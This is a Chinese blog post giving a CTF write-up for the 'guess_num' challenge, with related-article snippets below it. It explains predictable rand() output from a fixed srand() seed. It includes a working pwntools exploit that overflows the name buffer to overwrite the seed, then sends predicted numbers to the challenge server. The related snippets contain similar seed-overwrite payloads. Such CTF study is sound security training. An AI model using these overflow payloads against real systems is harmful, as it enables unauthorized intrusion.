rand()与srand() 攻防世界guess_num write_up

最新推荐文章于 2022-06-01 08:00:08 发布
最新推荐文章于 2022-06-01 08:00:08 发布
阅读量470 收藏 3
点赞数 1
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kwist_jay/article/details/106761249
版权

   srand设置产生一系列伪随机数发生器的起始点,要想把发生器重新初始化,可用1作seed值。任何共它的值都把发生器匿成一个随机的起始点。rand检索生成的伪随机数。在任何调用srand之前调用rand与以1作为seed调用srand产生相同的序列。

此函数可以设定rand函数所用的随机数产生演算法的种子值。任何大于一的种子值都会将rand随机数所产生的虚拟随机数序列重新设定一个起始点

                                                                                                                          ---取自百度百科srand()

以上的可以理解为当seed值确定时,调用rand函数产生的序列是不变的。

python里面调用srand函数和rand函数时,可以引入C++库,可以通过ldd来查看可执行程序的依赖库文件

然后在python里面引用:

#-*- coding:utf-8 -*-
from pwn import *
from ctypes import *

libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(1)

p = remote('220.249.52.133',54442)

p.sendlineafter('choice:','a'*0x20+ p64(1))

for i in range(0,10):
	p.sendlineafter('number:',str(libc.rand()%6+1))
p.interactive()

 

此处为guess_num的exp,输入name时栈覆盖seed的值,然后发送本地产生的序列,得到flag

kwist_jay
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN基础知识及基础栈溢出手法
山高路远
04-12 3911
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
乱七八糟的pwn入门(七)——6.random
Z_Pathon的博客
09-06 500
审题 首先看题目: 可以看出,这是一道关于随机数的题目。看一下代码: #include <stdio.h> int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ...
PWN做题笔记9-dice_game(调用libc库方法)
qq_40923256的博客
04-26 562
本题与“4”没有本质区别,这里说一下数组在栈中的存放以及libc库方法直接调用 buf数组大小55,但是读了0x50即80个字节,存在溢出 栈中数组元素存放如下: 因此构造payload覆盖seed地址变为0 可以利用ctypes库直接调用libc库中的方法。 代码如下: from pwn import * from ctypes import * p=remote("111.200.241.244","55029") payload=b"a"*0x40+p64(0) p.s.
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4522
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
srand((unsigned)time(NULL))和rand的区别
05-07 1501
 可以认为rand()在每次被调用的时候,它会查看:1) 如果用户在此之前调用过srand(seed),给seed指定了一个值,那么它会自动调用srand(seed)一次来初始化它的起始值。2) 如果用户在此之前没有调用过srand(seed),它会自动调用srand(1)一次。1) 如果希望rand()在每次程序运行时产生的值都不一样,必须给srand(seed)中的seed一个变值,这个变
Xman pwn guess_num writeup
qq_39596232的博客
08-24 899
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 分析思路: 1、首先查看一下文件详细信息: tucker@ubuntu:~/pwn$ file guess_num guess_num: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter ...
rand()与srand()_函数_随机数_
09-30
在C++编程语言中,`rand()`和`srand()`是两个非常重要的函数,它们用于生成和控制随机数序列。这两个函数通常与随机数生成相关的算法和应用紧密相连,如模拟、游戏开发、加密以及统计计算等领域。 `rand()`函数: `...
num_rain.rar_num_rain_数码雨
09-21
《C语言实现数码雨及其渐变与随机数应用》 在计算机编程领域,尤其是在图形界面设计中,"数码雨"是一种常见的动态效果,它通过数字不断滚动的方式营造出一种科技感十足的画面。本项目名为“num_rain.rar_num_rain_...
rand_sqrt_test.zip_vc6.0 随机数
09-14
double random_num = static_cast(rand()) / RAND_MAX; ``` 另一方面,`<ctime>`库中的`time(0)`函数获取当前时间作为随机数生成器的种子,确保每次运行程序时都能得到不同的随机序列。 接下来,我们讨论`sqrt()`...
C语言srandrand用法详解
07-25
本文主要对C语言中srandrand的用法进行详解。
Guess_game.rar_字游戏
09-20
1. **随机数生成**:游戏需要生成一个秘密数字,这通常通过C++的库中的`rand()`函数实现,配合`srand(time(NULL))`确保每次运行生成的数字都是随机的。 2. **用户输入**:通过`std::cin`获取用户的猜测,这是C++...
[攻防世界]guess_num
逆向萌新的博客
06-01 672
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
rand()与srand()函数用法
qq_42961473的博客
06-03 866
rand()函数通过一个叫“种子“的变量取得随机数值,得出的数值再作为“种子”参与下一次的运算,就得到所谓的随机数。 而srand()的作用就是用给定的数字(比如当前时间)来代替种子,这样能使随机函数更具有随机性。 一、rand()函数 rand()函数需要的头文件是:<stdlib.h>; rand()函数原型:int rand(void); rand()会返回一个范围在0到RAND...
php能做的事,PHP也能干大事 随机函数
weixin_39702714的博客
03-11 97
写在前面PHP也能干大事是我总结的PHP语法特性及相关函数类库的经典用法,并不一定是真正能实现四两拨千斤的功效,但是掌握这些方法,可以在你的工作和学习上有一些帮助,希望大家能集思广益,将《PHP也能干大事》丰富得更精彩!转载请注明出处(3mc2.com)二、前言PHP是常见的脚本语言,主要是因为其简单易学,上手快,几乎50%以上的Web程序都有PHP的身影(不完全统计)。PHP为开发这提供了丰富的...
攻防世界逆向高手题之Guess-the-Number
沐一 · 林 的博客
08-20 788
攻防世界逆向高手题之Guess-the-Number 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的Guess-the-Number 下载了一个jar文件,根据题目描述猜个数字然后找到flag.,估计题目类型是flag存储型,满足条件就有flag: 用我之前做安卓逆向下载的jar.gui打开,查看代码逻辑: 逻辑不难,果然是满足条件就有的存储型flag,这里我直接修改截断代码即可,xor是生成存储型flag的代码,要保留: import java.math.BigInteger; publ
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1278
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
Python 生成随机数的几种方法
HelloKandy's Blog
07-08 1320
random.random() 用于生成一个指定范围内的随机符点数,两个参数其中一个是上限,一个是下限。如果a > b,则生成随机数 print random.uniform(10, 20) #18.7356606526 print random.uniform(20, 10) #12.5798298022 random.randint 用于生成一个指定范围内的整数。其中参数a...
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7604
[CTF题目总结-web篇]攻防世界-warmup
攻防世界guess_num
zyh18851473527的博客
08-05 3030
首先下载附件 checksec一下再放入IDA中 点击进入sub_C3E函数,发现条件成立即可找到flag 接着进入v7 发现var_30在栈中占0x20,可以覆盖到seed 即利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 ...
randsrand 的用法
最新发布
10-30
randsrand是C语言中用于生成随机数的函数。其中rand函数用于生成一个伪随机数,而srand函数则用于初始化rand函数的种子。在使用rand函数之前,需要先使用srand函数来初始化种子,否则每次生成的随机数都是相同的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值